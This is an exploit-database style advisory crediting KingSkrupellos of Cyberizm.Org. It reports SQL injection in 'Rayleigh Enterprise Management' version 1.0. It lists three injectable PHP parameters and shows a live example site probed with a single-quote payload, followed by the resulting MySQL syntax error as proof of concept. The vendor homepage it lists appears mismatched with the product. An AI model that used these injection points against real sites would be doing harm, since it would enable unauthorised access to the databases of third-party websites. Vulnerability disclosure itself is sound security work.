Rayleigh Enterprise Management MiitBeianGovCn version 1.0 suffers from a remote SQL injection vulnerability.
5bc737bd5ad59bf16243287fd7b68654###############################################################
# Exploit Title : Rayleigh Enterprise Management MiitBeianGovCn 1.0 SQL
Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : miitbeian.gov.cn
# Tested On : Windows
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link :
cyberizm.org/cyberizm-rayleigh-enterprise-management-delling-sql-injection.html
###############################################################
CopyRight A(c) 2013 Rayleigh Enterprise Management
Technical Support Delling China SQL Injection Vulnerability
###############################################################
# Exploit : /aboutus.php?id=[ID-Number]&type=[SQL Injection]
# Exploit : /list.php?big_id=[ID-Number]&sec_id=[SQL Injection]
# Exploit : /cont.php?id=[ID-Number]&sec_id=[ID-Number]&big_id=[ID-Number]
###############################################################
# Example Site => relay2009.com/aboutus.php?id=1&type=1%27
=> [ Proof of Concept for SQL Inj ] => archive.is/fEijr
# SQL/DB Error :
Error! info: Can not Select to MySQL server!
Script: /aboutus.php
Error: You have an error in your SQL syntax; check
the manual that corresponds
to your MySQL server version for the right syntax
to use near '\' and language=0' at line 1 Errno.: 1064
###############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###############################################################